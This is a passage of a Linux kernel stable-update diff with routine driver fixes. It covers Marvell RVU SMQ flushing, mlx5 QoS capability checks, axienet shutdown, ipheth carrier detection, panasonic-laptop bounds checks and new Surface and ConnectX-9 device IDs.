++{
++	u64 cir_off, pir_off, cir_val, pir_val;
++	struct nix_smq_tree_ctx *smq_tree_ctx;
++	int lvl;
++
++	for (lvl = NIX_TXSCH_LVL_SMQ; lvl <= NIX_TXSCH_LVL_TL1; lvl++) {
++		smq_tree_ctx = &smq_flush_ctx->smq_tree_ctx[lvl];
++		cir_off = smq_tree_ctx->cir_off;
++		cir_val = smq_tree_ctx->cir_val;
++		pir_off = smq_tree_ctx->pir_off;
++		pir_val = smq_tree_ctx->pir_val;
++
++		if (enable) {
++			rvu_write64(rvu, blkaddr, cir_off, cir_val);
++			if (lvl != NIX_TXSCH_LVL_TL1)
++				rvu_write64(rvu, blkaddr, pir_off, pir_val);
++		} else {
++			rvu_write64(rvu, blkaddr, cir_off, 0x0);
++			if (lvl != NIX_TXSCH_LVL_TL1)
++				rvu_write64(rvu, blkaddr, pir_off, 0x0);
++		}
++	}
++}
++
+ static int nix_smq_flush(struct rvu *rvu, int blkaddr,
+ 			 int smq, u16 pcifunc, int nixlf)
+ {
++	struct nix_smq_flush_ctx *smq_flush_ctx;
++	int err, restore_tx_en = 0, i;
+ 	int pf = rvu_get_pf(pcifunc);
+ 	u8 cgx_id = 0, lmac_id = 0;
+-	int err, restore_tx_en = 0;
+-	u64 cfg;
++	u16 tl2_tl3_link_schq;
++	u8 link, link_level;
++	u64 cfg, bmap = 0;
+ 
+ 	/* enable cgx tx if disabled */
+ 	if (is_pf_cgxmapped(rvu, pf)) {
+@@ -2136,22 +2250,69 @@ static int nix_smq_flush(struct rvu *rvu, int blkaddr,
+ 						   lmac_id, true);
+ 	}
+ 
+-	cfg = rvu_read64(rvu, blkaddr, NIX_AF_SMQX_CFG(smq));
+-	/* Do SMQ flush and set enqueue xoff */
+-	cfg |= BIT_ULL(50) | BIT_ULL(49);
+-	rvu_write64(rvu, blkaddr, NIX_AF_SMQX_CFG(smq), cfg);
++	/* XOFF all TL2s whose parent TL1 matches SMQ tree TL1 */
++	smq_flush_ctx = kzalloc(sizeof(*smq_flush_ctx), GFP_KERNEL);
++	if (!smq_flush_ctx)
++		return -ENOMEM;
++	nix_smq_flush_fill_ctx(rvu, blkaddr, smq, smq_flush_ctx);
++	nix_smq_flush_enadis_xoff(rvu, blkaddr, smq_flush_ctx, true);
++	nix_smq_flush_enadis_rate(rvu, blkaddr, smq_flush_ctx, false);
+ 
+ 	/* Disable backpressure from physical link,
+ 	 * otherwise SMQ flush may stall.
+ 	 */
+ 	rvu_cgx_enadis_rx_bp(rvu, pf, false);
+ 
++	link_level = rvu_read64(rvu, blkaddr, NIX_AF_PSE_CHANNEL_LEVEL) & 0x01 ?
++			NIX_TXSCH_LVL_TL3 : NIX_TXSCH_LVL_TL2;
++	tl2_tl3_link_schq = smq_flush_ctx->smq_tree_ctx[link_level].schq;
++	link = smq_flush_ctx->smq_tree_ctx[NIX_TXSCH_LVL_TL1].schq;
++
++	/* SMQ set enqueue xoff */
++	cfg = rvu_read64(rvu, blkaddr, NIX_AF_SMQX_CFG(smq));
++	cfg |= BIT_ULL(50);
++	rvu_write64(rvu, blkaddr, NIX_AF_SMQX_CFG(smq), cfg);
++
++	/* Clear all NIX_AF_TL3_TL2_LINK_CFG[ENA] for the TL3/TL2 queue */
++	for (i = 0; i < (rvu->hw->cgx_links + rvu->hw->lbk_links); i++) {
++		cfg = rvu_read64(rvu, blkaddr,
++				 NIX_AF_TL3_TL2X_LINKX_CFG(tl2_tl3_link_schq, link));
++		if (!(cfg & BIT_ULL(12)))
++			continue;
++		bmap |= (1 << i);
++		cfg &= ~BIT_ULL(12);
++		rvu_write64(rvu, blkaddr,
++			    NIX_AF_TL3_TL2X_LINKX_CFG(tl2_tl3_link_schq, link), cfg);
++	}
++
++	/* Do SMQ flush and set enqueue xoff */
++	cfg = rvu_read64(rvu, blkaddr, NIX_AF_SMQX_CFG(smq));
++	cfg |= BIT_ULL(50) | BIT_ULL(49);
++	rvu_write64(rvu, blkaddr, NIX_AF_SMQX_CFG(smq), cfg);
++
+ 	/* Wait for flush to complete */
+ 	err = rvu_poll_reg(rvu, blkaddr,
+ 			   NIX_AF_SMQX_CFG(smq), BIT_ULL(49), true);
+ 	if (err)
+-		dev_err(rvu->dev,
+-			"NIXLF%d: SMQ%d flush failed\n", nixlf, smq);
++		dev_info(rvu->dev,
++			 "NIXLF%d: SMQ%d flush failed, txlink might be busy\n",
++			 nixlf, smq);
++
++	/* Set NIX_AF_TL3_TL2_LINKX_CFG[ENA] for the TL3/TL2 queue */
++	for (i = 0; i < (rvu->hw->cgx_links + rvu->hw->lbk_links); i++) {
++		if (!(bmap & (1 << i)))
++			continue;
++		cfg = rvu_read64(rvu, blkaddr,
++				 NIX_AF_TL3_TL2X_LINKX_CFG(tl2_tl3_link_schq, link));
++		cfg |= BIT_ULL(12);
++		rvu_write64(rvu, blkaddr,
++			    NIX_AF_TL3_TL2X_LINKX_CFG(tl2_tl3_link_schq, link), cfg);
++	}
++
++	/* clear XOFF on TL2s */
++	nix_smq_flush_enadis_rate(rvu, blkaddr, smq_flush_ctx, true);
++	nix_smq_flush_enadis_xoff(rvu, blkaddr, smq_flush_ctx, false);
++	kfree(smq_flush_ctx);
+ 
+ 	rvu_cgx_enadis_rx_bp(rvu, pf, true);
+ 	/* restore cgx tx state */
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en_ethtool.c b/drivers/net/ethernet/mellanox/mlx5/core/en_ethtool.c
+index 3ee61987266c49..8cb127a6fabfed 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en_ethtool.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en_ethtool.c
+@@ -136,6 +136,10 @@ void mlx5e_build_ptys2ethtool_map(void)
+ 				       ETHTOOL_LINK_MODE_100000baseKR4_Full_BIT);
+ 	MLX5_BUILD_PTYS2ETHTOOL_CONFIG(MLX5E_100GBASE_LR4, legacy,
+ 				       ETHTOOL_LINK_MODE_100000baseLR4_ER4_Full_BIT);
++	MLX5_BUILD_PTYS2ETHTOOL_CONFIG(MLX5E_100BASE_TX, legacy,
++				       ETHTOOL_LINK_MODE_100baseT_Full_BIT);
++	MLX5_BUILD_PTYS2ETHTOOL_CONFIG(MLX5E_1000BASE_T, legacy,
++				       ETHTOOL_LINK_MODE_1000baseT_Full_BIT);
+ 	MLX5_BUILD_PTYS2ETHTOOL_CONFIG(MLX5E_10GBASE_T, legacy,
+ 				       ETHTOOL_LINK_MODE_10000baseT_Full_BIT);
+ 	MLX5_BUILD_PTYS2ETHTOOL_CONFIG(MLX5E_25GBASE_CR, legacy,
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/esw/legacy.c b/drivers/net/ethernet/mellanox/mlx5/core/esw/legacy.c
+index fabe49a35a5c96..a47e93caccb10c 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/esw/legacy.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/esw/legacy.c
+@@ -321,7 +321,7 @@ int mlx5_eswitch_set_vepa(struct mlx5_eswitch *esw, u8 setting)
+ 		return -EPERM;
+ 
+ 	mutex_lock(&esw->state_lock);
+-	if (esw->mode != MLX5_ESWITCH_LEGACY) {
++	if (esw->mode != MLX5_ESWITCH_LEGACY || !mlx5_esw_is_fdb_created(esw)) {
+ 		err = -EOPNOTSUPP;
+ 		goto out;
+ 	}
+@@ -341,7 +341,7 @@ int mlx5_eswitch_get_vepa(struct mlx5_eswitch *esw, u8 *setting)
+ 	if (!mlx5_esw_allowed(esw))
+ 		return -EPERM;
+ 
+-	if (esw->mode != MLX5_ESWITCH_LEGACY)
++	if (esw->mode != MLX5_ESWITCH_LEGACY || !mlx5_esw_is_fdb_created(esw))
+ 		return -EOPNOTSUPP;
+ 
+ 	*setting = esw->fdb_table.legacy.vepa_uplink_rule ? 1 : 0;
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/esw/qos.c b/drivers/net/ethernet/mellanox/mlx5/core/esw/qos.c
+index 75015d370922e6..a7400ed4956e6a 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/esw/qos.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/esw/qos.c
+@@ -311,6 +311,25 @@ static int esw_qos_set_group_max_rate(struct mlx5_eswitch *esw,
+ 	return err;
+ }
+ 
++static bool esw_qos_element_type_supported(struct mlx5_core_dev *dev, int type)
++{
++	switch (type) {
++	case SCHEDULING_CONTEXT_ELEMENT_TYPE_TSAR:
++		return MLX5_CAP_QOS(dev, esw_element_type) &
++		       ELEMENT_TYPE_CAP_MASK_TSAR;
++	case SCHEDULING_CONTEXT_ELEMENT_TYPE_VPORT:
++		return MLX5_CAP_QOS(dev, esw_element_type) &
++		       ELEMENT_TYPE_CAP_MASK_VPORT;
++	case SCHEDULING_CONTEXT_ELEMENT_TYPE_VPORT_TC:
++		return MLX5_CAP_QOS(dev, esw_element_type) &
++		       ELEMENT_TYPE_CAP_MASK_VPORT_TC;
++	case SCHEDULING_CONTEXT_ELEMENT_TYPE_PARA_VPORT_TC:
++		return MLX5_CAP_QOS(dev, esw_element_type) &
++		       ELEMENT_TYPE_CAP_MASK_PARA_VPORT_TC;
++	}
++	return false;
++}
++
+ static int esw_qos_vport_create_sched_element(struct mlx5_eswitch *esw,
+ 					      struct mlx5_vport *vport,
+ 					      u32 max_rate, u32 bw_share)
+@@ -322,6 +341,9 @@ static int esw_qos_vport_create_sched_element(struct mlx5_eswitch *esw,
+ 	void *vport_elem;
+ 	int err;
+ 
++	if (!esw_qos_element_type_supported(dev, SCHEDULING_CONTEXT_ELEMENT_TYPE_VPORT))
++		return -EOPNOTSUPP;
++
+ 	parent_tsar_ix = group ? group->tsar_ix : esw->qos.root_tsar_ix;
+ 	MLX5_SET(scheduling_context, sched_ctx, element_type,
+ 		 SCHEDULING_CONTEXT_ELEMENT_TYPE_VPORT);
+@@ -420,6 +442,7 @@ __esw_qos_create_rate_group(struct mlx5_eswitch *esw, struct netlink_ext_ack *ex
+ {
+ 	u32 tsar_ctx[MLX5_ST_SZ_DW(scheduling_context)] = {};
+ 	struct mlx5_esw_rate_group *group;
++	__be32 *attr;
+ 	u32 divider;
+ 	int err;
+ 
+@@ -427,6 +450,12 @@ __esw_qos_create_rate_group(struct mlx5_eswitch *esw, struct netlink_ext_ack *ex
+ 	if (!group)
+ 		return ERR_PTR(-ENOMEM);
+ 
++	MLX5_SET(scheduling_context, tsar_ctx, element_type,
++		 SCHEDULING_CONTEXT_ELEMENT_TYPE_TSAR);
++
++	attr = MLX5_ADDR_OF(scheduling_context, tsar_ctx, element_attributes);
++	*attr = cpu_to_be32(TSAR_ELEMENT_TSAR_TYPE_DWRR << 16);
++
+ 	MLX5_SET(scheduling_context, tsar_ctx, parent_element_id,
+ 		 esw->qos.root_tsar_ix);
+ 	err = mlx5_create_scheduling_element_cmd(esw->dev,
+@@ -525,25 +554,6 @@ static int esw_qos_destroy_rate_group(struct mlx5_eswitch *esw,
+ 	return err;
+ }
+ 
+-static bool esw_qos_element_type_supported(struct mlx5_core_dev *dev, int type)
+-{
+-	switch (type) {
+-	case SCHEDULING_CONTEXT_ELEMENT_TYPE_TSAR:
+-		return MLX5_CAP_QOS(dev, esw_element_type) &
+-		       ELEMENT_TYPE_CAP_MASK_TASR;
+-	case SCHEDULING_CONTEXT_ELEMENT_TYPE_VPORT:
+-		return MLX5_CAP_QOS(dev, esw_element_type) &
+-		       ELEMENT_TYPE_CAP_MASK_VPORT;
+-	case SCHEDULING_CONTEXT_ELEMENT_TYPE_VPORT_TC:
+-		return MLX5_CAP_QOS(dev, esw_element_type) &
+-		       ELEMENT_TYPE_CAP_MASK_VPORT_TC;
+-	case SCHEDULING_CONTEXT_ELEMENT_TYPE_PARA_VPORT_TC:
+-		return MLX5_CAP_QOS(dev, esw_element_type) &
+-		       ELEMENT_TYPE_CAP_MASK_PARA_VPORT_TC;
+-	}
+-	return false;
+-}
+-
+ static int esw_qos_create(struct mlx5_eswitch *esw, struct netlink_ext_ack *extack)
+ {
+ 	u32 tsar_ctx[MLX5_ST_SZ_DW(scheduling_context)] = {};
+@@ -554,7 +564,8 @@ static int esw_qos_create(struct mlx5_eswitch *esw, struct netlink_ext_ack *exta
+ 	if (!MLX5_CAP_GEN(dev, qos) || !MLX5_CAP_QOS(dev, esw_scheduling))
+ 		return -EOPNOTSUPP;
+ 
+-	if (!esw_qos_element_type_supported(dev, SCHEDULING_CONTEXT_ELEMENT_TYPE_TSAR))
++	if (!esw_qos_element_type_supported(dev, SCHEDULING_CONTEXT_ELEMENT_TYPE_TSAR) ||
++	    !(MLX5_CAP_QOS(dev, esw_tsar_type) & TSAR_TYPE_CAP_MASK_DWRR))
+ 		return -EOPNOTSUPP;
+ 
+ 	MLX5_SET(scheduling_context, tsar_ctx, element_type,
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/main.c b/drivers/net/ethernet/mellanox/mlx5/core/main.c
+index 67849b1c0bb71e..76af59cfdd0e64 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/main.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/main.c
+@@ -2025,6 +2025,7 @@ static const struct pci_device_id mlx5_core_pci_table[] = {
+ 	{ PCI_VDEVICE(MELLANOX, 0x101f) },			/* ConnectX-6 LX */
+ 	{ PCI_VDEVICE(MELLANOX, 0x1021) },			/* ConnectX-7 */
+ 	{ PCI_VDEVICE(MELLANOX, 0x1023) },			/* ConnectX-8 */
++	{ PCI_VDEVICE(MELLANOX, 0x1025) },			/* ConnectX-9 */
+ 	{ PCI_VDEVICE(MELLANOX, 0xa2d2) },			/* BlueField integrated ConnectX-5 network controller */
+ 	{ PCI_VDEVICE(MELLANOX, 0xa2d3), MLX5_PCI_DEV_IS_VF},	/* BlueField integrated ConnectX-5 network controller VF */
+ 	{ PCI_VDEVICE(MELLANOX, 0xa2d6) },			/* BlueField-2 integrated ConnectX-6 Dx network controller */
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/qos.c b/drivers/net/ethernet/mellanox/mlx5/core/qos.c
+index 8bce730b5c5bef..db2bd3ad63ba36 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/qos.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/qos.c
+@@ -28,6 +28,9 @@ int mlx5_qos_create_leaf_node(struct mlx5_core_dev *mdev, u32 parent_id,
+ {
+ 	u32 sched_ctx[MLX5_ST_SZ_DW(scheduling_context)] = {0};
+ 
++	if (!(MLX5_CAP_QOS(mdev, nic_element_type) & ELEMENT_TYPE_CAP_MASK_QUEUE_GROUP))
++		return -EOPNOTSUPP;
++
+ 	MLX5_SET(scheduling_context, sched_ctx, parent_element_id, parent_id);
+ 	MLX5_SET(scheduling_context, sched_ctx, element_type,
+ 		 SCHEDULING_CONTEXT_ELEMENT_TYPE_QUEUE_GROUP);
+@@ -44,6 +47,10 @@ int mlx5_qos_create_inner_node(struct mlx5_core_dev *mdev, u32 parent_id,
+ 	u32 sched_ctx[MLX5_ST_SZ_DW(scheduling_context)] = {0};
+ 	void *attr;
+ 
++	if (!(MLX5_CAP_QOS(mdev, nic_element_type) & ELEMENT_TYPE_CAP_MASK_TSAR) ||
++	    !(MLX5_CAP_QOS(mdev, nic_tsar_type) & TSAR_TYPE_CAP_MASK_DWRR))
++		return -EOPNOTSUPP;
++
+ 	MLX5_SET(scheduling_context, sched_ctx, parent_element_id, parent_id);
+ 	MLX5_SET(scheduling_context, sched_ctx, element_type,
+ 		 SCHEDULING_CONTEXT_ELEMENT_TYPE_TSAR);
+diff --git a/drivers/net/ethernet/xilinx/xilinx_axienet.h b/drivers/net/ethernet/xilinx/xilinx_axienet.h
+index 503c32413474a2..deb94c26c605b0 100644
+--- a/drivers/net/ethernet/xilinx/xilinx_axienet.h
++++ b/drivers/net/ethernet/xilinx/xilinx_axienet.h
+@@ -419,6 +419,8 @@ struct axidma_bd {
+  * @tx_bytes:	TX byte count for statistics
+  * @tx_stat_sync: Synchronization object for TX stats
+  * @dma_err_task: Work structure to process Axi DMA errors
++ * @stopping:   Set when @dma_err_task shouldn't do anything because we are
++ *              about to stop the device.
+  * @tx_irq:	Axidma TX IRQ number
+  * @rx_irq:	Axidma RX IRQ number
+  * @eth_irq:	Ethernet core IRQ number
+@@ -481,6 +483,7 @@ struct axienet_local {
+ 	struct u64_stats_sync tx_stat_sync;
+ 
+ 	struct work_struct dma_err_task;
++	bool stopping;
+ 
+ 	int tx_irq;
+ 	int rx_irq;
+diff --git a/drivers/net/ethernet/xilinx/xilinx_axienet_main.c b/drivers/net/ethernet/xilinx/xilinx_axienet_main.c
+index 59d1cfbf7d6b78..b631d80de33707 100644
+--- a/drivers/net/ethernet/xilinx/xilinx_axienet_main.c
++++ b/drivers/net/ethernet/xilinx/xilinx_axienet_main.c
+@@ -1161,6 +1161,7 @@ static int axienet_open(struct net_device *ndev)
+ 	phylink_start(lp->phylink);
+ 
+ 	/* Enable worker thread for Axi DMA error handling */
++	lp->stopping = false;
+ 	INIT_WORK(&lp->dma_err_task, axienet_dma_err_handler);
+ 
+ 	napi_enable(&lp->napi_rx);
+@@ -1216,6 +1217,9 @@ static int axienet_stop(struct net_device *ndev)
+ 
+ 	dev_dbg(&ndev->dev, "axienet_close()\n");
+ 
++	WRITE_ONCE(lp->stopping, true);
++	flush_work(&lp->dma_err_task);
++
+ 	napi_disable(&lp->napi_tx);
+ 	napi_disable(&lp->napi_rx);
+ 
+@@ -1760,6 +1764,10 @@ static void axienet_dma_err_handler(struct work_struct *work)
+ 						dma_err_task);
+ 	struct net_device *ndev = lp->ndev;
+ 
++	/* Don't bother if we are going to stop anyway */
++	if (READ_ONCE(lp->stopping))
++		return;
++
+ 	napi_disable(&lp->napi_tx);
+ 	napi_disable(&lp->napi_rx);
+ 
+diff --git a/drivers/net/phy/vitesse.c b/drivers/net/phy/vitesse.c
+index 897b979ec03c81..3b5fcaf0dd36db 100644
+--- a/drivers/net/phy/vitesse.c
++++ b/drivers/net/phy/vitesse.c
+@@ -237,16 +237,6 @@ static int vsc739x_config_init(struct phy_device *phydev)
+ 	return 0;
+ }
+ 
+-static int vsc73xx_config_aneg(struct phy_device *phydev)
+-{
+-	/* The VSC73xx switches does not like to be instructed to
+-	 * do autonegotiation in any way, it prefers that you just go
+-	 * with the power-on/reset defaults. Writing some registers will
+-	 * just make autonegotiation permanently fail.
+-	 */
+-	return 0;
+-}
+-
+ /* This adds a skew for both TX and RX clocks, so the skew should only be
+  * applied to "rgmii-id" interfaces. It may not work as expected
+  * on "rgmii-txid", "rgmii-rxid" or "rgmii" interfaces.
+@@ -444,7 +434,6 @@ static struct phy_driver vsc82xx_driver[] = {
+ 	.phy_id_mask    = 0x000ffff0,
+ 	/* PHY_GBIT_FEATURES */
+ 	.config_init    = vsc738x_config_init,
+-	.config_aneg    = vsc73xx_config_aneg,
+ 	.read_page      = vsc73xx_read_page,
+ 	.write_page     = vsc73xx_write_page,
+ }, {
+@@ -453,7 +442,6 @@ static struct phy_driver vsc82xx_driver[] = {
+ 	.phy_id_mask    = 0x000ffff0,
+ 	/* PHY_GBIT_FEATURES */
+ 	.config_init    = vsc738x_config_init,
+-	.config_aneg    = vsc73xx_config_aneg,
+ 	.read_page      = vsc73xx_read_page,
+ 	.write_page     = vsc73xx_write_page,
+ }, {
+@@ -462,7 +450,6 @@ static struct phy_driver vsc82xx_driver[] = {
+ 	.phy_id_mask    = 0x000ffff0,
+ 	/* PHY_GBIT_FEATURES */
+ 	.config_init    = vsc739x_config_init,
+-	.config_aneg    = vsc73xx_config_aneg,
+ 	.read_page      = vsc73xx_read_page,
+ 	.write_page     = vsc73xx_write_page,
+ }, {
+@@ -471,7 +458,6 @@ static struct phy_driver vsc82xx_driver[] = {
+ 	.phy_id_mask    = 0x000ffff0,
+ 	/* PHY_GBIT_FEATURES */
+ 	.config_init    = vsc739x_config_init,
+-	.config_aneg    = vsc73xx_config_aneg,
+ 	.read_page      = vsc73xx_read_page,
+ 	.write_page     = vsc73xx_write_page,
+ }, {
+diff --git a/drivers/net/usb/ipheth.c b/drivers/net/usb/ipheth.c
+index 13381d87eeb095..17844c07305c39 100644
+--- a/drivers/net/usb/ipheth.c
++++ b/drivers/net/usb/ipheth.c
+@@ -253,13 +253,14 @@ static int ipheth_carrier_set(struct ipheth_device *dev)
+ 			0x02, /* index */
+ 			dev->ctrl_buf, IPHETH_CTRL_BUF_SIZE,
+ 			IPHETH_CTRL_TIMEOUT);
+-	if (retval < 0) {
++	if (retval <= 0) {
+ 		dev_err(&dev->intf->dev, "%s: usb_control_msg: %d\n",
+ 			__func__, retval);
+ 		return retval;
+ 	}
+ 
+-	if (dev->ctrl_buf[0] == IPHETH_CARRIER_ON) {
++	if ((retval == 1 && dev->ctrl_buf[0] == IPHETH_CARRIER_ON) ||
++	    (retval >= 2 && dev->ctrl_buf[1] == IPHETH_CARRIER_ON)) {
+ 		netif_carrier_on(dev->net);
+ 		if (dev->tx_urb->status != -EINPROGRESS)
+ 			netif_wake_queue(dev->net);
+diff --git a/drivers/pinctrl/intel/pinctrl-meteorlake.c b/drivers/pinctrl/intel/pinctrl-meteorlake.c
+index 9576dcd1cb2997..84ea62cb86c6ea 100644
+--- a/drivers/pinctrl/intel/pinctrl-meteorlake.c
++++ b/drivers/pinctrl/intel/pinctrl-meteorlake.c
+@@ -395,6 +395,7 @@ static const struct intel_pinctrl_soc_data mtlp_soc_data = {
+ };
+ 
+ static const struct acpi_device_id mtl_pinctrl_acpi_match[] = {
++	{ "INTC105E", (kernel_ulong_t)&mtlp_soc_data },
+ 	{ "INTC1083", (kernel_ulong_t)&mtlp_soc_data },
+ 	{ }
+ };
+diff --git a/drivers/platform/surface/surface_aggregator_registry.c b/drivers/platform/surface/surface_aggregator_registry.c
+index 023f126121d7d0..fafb0bb49f7f62 100644
+--- a/drivers/platform/surface/surface_aggregator_registry.c
++++ b/drivers/platform/surface/surface_aggregator_registry.c
+@@ -298,7 +298,7 @@ static const struct software_node *ssam_node_group_sp8[] = {
+ 	NULL,
+ };
+ 
+-/* Devices for Surface Pro 9 */
++/* Devices for Surface Pro 9 and 10 */
+ static const struct software_node *ssam_node_group_sp9[] = {
+ 	&ssam_node_root,
+ 	&ssam_node_hub_kip,
+@@ -337,6 +337,9 @@ static const struct acpi_device_id ssam_platform_hub_match[] = {
+ 	/* Surface Pro 9 */
+ 	{ "MSHW0343", (unsigned long)ssam_node_group_sp9 },
+ 
++	/* Surface Pro 10 */
++	{ "MSHW0510", (unsigned long)ssam_node_group_sp9 },
++
+ 	/* Surface Book 2 */
+ 	{ "MSHW0107", (unsigned long)ssam_node_group_gen5 },
+ 
+@@ -367,6 +370,9 @@ static const struct acpi_device_id ssam_platform_hub_match[] = {
+ 	/* Surface Laptop Go 2 */
+ 	{ "MSHW0290", (unsigned long)ssam_node_group_slg1 },
+ 
++	/* Surface Laptop Go 3 */
++	{ "MSHW0440", (unsigned long)ssam_node_group_slg1 },
++
+ 	/* Surface Laptop Studio */
+ 	{ "MSHW0123", (unsigned long)ssam_node_group_sls },
+ 
+diff --git a/drivers/platform/x86/panasonic-laptop.c b/drivers/platform/x86/panasonic-laptop.c
+index ad3083f9946d4d..ac7fb7a8fd592e 100644
+--- a/drivers/platform/x86/panasonic-laptop.c
++++ b/drivers/platform/x86/panasonic-laptop.c
+@@ -337,7 +337,8 @@ static int acpi_pcc_retrieve_biosdata(struct pcc_acpi *pcc)
+ 	}
+ 
+ 	if (pcc->num_sifr < hkey->package.count) {
+-		pr_err("SQTY reports bad SINF length\n");
++		pr_err("SQTY reports bad SINF length SQTY: %lu SINF-pkg-count: %u\n",
++		       pcc->num_sifr, hkey->package.count);
+ 		status = AE_ERROR;
+ 		goto end;
+ 	}
+@@ -773,6 +774,24 @@ static DEVICE_ATTR_RW(dc_brightness);
+ static DEVICE_ATTR_RW(current_brightness);
+ static DEVICE_ATTR_RW(cdpower);
+ 
++static umode_t pcc_sysfs_is_visible(struct kobject *kobj, struct attribute *attr, int idx)
++{
++	struct device *dev = kobj_to_dev(kobj);
++	struct acpi_device *acpi = to_acpi_device(dev);
++	struct pcc_acpi *pcc = acpi_driver_data(acpi);
++
++	if (attr == &dev_attr_mute.attr)
++		return (pcc->num_sifr > SINF_MUTE) ? attr->mode : 0;
++
++	if (attr == &dev_attr_eco_mode.attr)
++		return (pcc->num_sifr > SINF_ECO_MODE) ? attr->mode : 0;
++
++	if (attr == &dev_attr_current_brightness.attr)
++		return (pcc->num_sifr > SINF_CUR_BRIGHT) ? attr->mode : 0;
++
++	return attr->mode;
++}
++
+ static struct attribute *pcc_sysfs_entries[] = {
+ 	&dev_attr_numbatt.attr,
+ 	&dev_attr_lcdtype.attr,
+@@ -787,8 +806,9 @@ static struct attribute *pcc_sysfs_entries[] = {
+ };
+ 
+ static const struct attribute_group pcc_attr_group = {
+-	.name	= NULL,		/* put in device directory */
+-	.attrs	= pcc_sysfs_entries,
++	.name		= NULL,		/* put in device directory */
++	.attrs		= pcc_sysfs_entries,
++	.is_visible	= pcc_sysfs_is_visible,
+ };
+ 
+ 
+@@ -941,12 +961,15 @@ static int acpi_pcc_hotkey_resume(struct device *dev)
+ 	if (!pcc)
+ 		return -EINVAL;
+ 
+-	acpi_pcc_write_sset(pcc, SINF_MUTE, pcc->mute);
+-	acpi_pcc_write_sset(pcc, SINF_ECO_MODE, pcc->eco_mode);
++	if (pcc->num_sifr > SINF_MUTE)
++		acpi_pcc_write_sset(pcc, SINF_MUTE, pcc->mute);
++	if (pcc->num_sifr > SINF_ECO_MODE)
++		acpi_pcc_write_sset(pcc, SINF_ECO_MODE, pcc->eco_mode);
+ 	acpi_pcc_write_sset(pcc, SINF_STICKY_KEY, pcc->sticky_key);
+ 	acpi_pcc_write_sset(pcc, SINF_AC_CUR_BRIGHT, pcc->ac_brightness);
+ 	acpi_pcc_write_sset(pcc, SINF_DC_CUR_BRIGHT, pcc->dc_brightness);
+-	acpi_pcc_write_sset(pcc, SINF_CUR_BRIGHT, pcc->current_brightness);
++	if (pcc->num_sifr > SINF_CUR_BRIGHT)
++		acpi_pcc_write_sset(pcc, SINF_CUR_BRIGHT, pcc->current_brightness);
+ 
+ 	return 0;
+ }
+@@ -963,11 +986,21 @@ static int acpi_pcc_hotkey_add(struct acpi_device *device)
+ 
+ 	num_sifr = acpi_pcc_get_sqty(device);
+ 
+-	if (num_sifr < 0 || num_sifr > 255) {
+-		pr_err("num_sifr out of range");
++	/*
++	 * pcc->sinf is expected to at least have the AC+DC brightness entries.
++	 * Accesses to higher SINF entries are checked against num_sifr.
++	 */
++	if (num_sifr <= SINF_DC_CUR_BRIGHT || num_sifr > 255) {
++		pr_err("num_sifr %d out of range %d - 255\n", num_sifr, SINF_DC_CUR_BRIGHT + 1);
+ 		return -ENODEV;
+ 	}
+ 
++	/*
++	 * Some DSDT-s have an off-by-one bug where the SINF package count is
++	 * one higher than the SQTY reported value, allocate 1 entry extra.
++	 */
++	num_sifr++;
++
+ 	pcc = kzalloc(sizeof(struct pcc_acpi), GFP_KERNEL);
+ 	if (!pcc) {
+ 		pr_err("Couldn't allocate mem for pcc");
+@@ -1020,11 +1053,14 @@ static int acpi_pcc_hotkey_add(struct acpi_device *device)
+ 	acpi_pcc_write_sset(pcc, SINF_STICKY_KEY, 0);
+ 	pcc->sticky_key = 0;
+ 
+-	pcc->eco_mode = pcc->sinf[SINF_ECO_MODE];
+-	pcc->mute = pcc->sinf[SINF_MUTE];
+ 	pcc->ac_brightness = pcc->sinf[SINF_AC_CUR_BRIGHT];
+ 	pcc->dc_brightness = pcc->sinf[SINF_DC_CUR_BRIGHT];
+-	pcc->current_brightness = pcc->sinf[SINF_CUR_BRIGHT];
++	if (pcc->num_sifr > SINF_MUTE)
++		pcc->mute = pcc->sinf[SINF_MUTE];
++	if (pcc->num_sifr > SINF_ECO_MODE)
++		pcc->eco_mode = pcc->sinf[SINF_ECO_MODE];
++	if (pcc->num_sifr > SINF_CUR_BRIGHT)
++		pcc->current_brightness = pcc->sinf[SINF_CUR_BRIGHT];
+ 
+ 	/* add sysfs attributes */
+ 	result = sysfs_create_group(&device->dev.kobj, &pcc_attr_group);
+diff --git a/drivers/soc/ti/omap_prm.c b/drivers/soc/ti/omap_prm.c
+index 913b964374a444..33ef58195955db 100644
+--- a/drivers/soc/ti/omap_prm.c
++++ b/drivers/soc/ti/omap_prm.c
+@@ -696,6 +696,8 @@ static int omap_prm_domain_init(struct device *dev, struct omap_prm *prm)
+ 	data = prm->data;
+ 	name = devm_kasprintf(dev, GFP_KERNEL, "prm_%s",
+ 			      data->name);
++	if (!name)
++		return -ENOMEM;
+ 
+ 	prmd->dev = dev;
+ 	prmd->prm = prm;
+diff --git a/drivers/soundwire/stream.c b/drivers/soundwire/stream.c
+index 2a245f3b7738f6..2624441d2fa92c 100644
+--- a/drivers/soundwire/stream.c
++++ b/drivers/soundwire/stream.c
+@@ -1272,18 +1272,18 @@ struct sdw_dpn_prop *sdw_get_slave_dpn_prop(struct sdw_slave *slave,
+ 					    unsigned int port_num)
+ {
+ 	struct sdw_dpn_prop *dpn_prop;
+-	unsigned long mask;
++	u8 num_ports;
+ 	int i;
+ 
+ 	if (direction == SDW_DATA_DIR_TX) {
+-		mask = slave->prop.source_ports;
++		num_ports = hweight32(slave->prop.source_ports);
+ 		dpn_prop = slave->prop.src_dpn_prop;
+ 	} else {
+-		mask = slave->prop.sink_ports;
++		num_ports = hweight32(slave->prop.sink_ports);
+ 		dpn_prop = slave->prop.sink_dpn_prop;
+ 	}
+ 
+-	for_each_set_bit(i, &mask, 32) {
++	for (i = 0; i < num_ports; i++) {
+ 		if (dpn_prop[i].num == port_num)
+ 			return &dpn_prop[i];
+ 	}
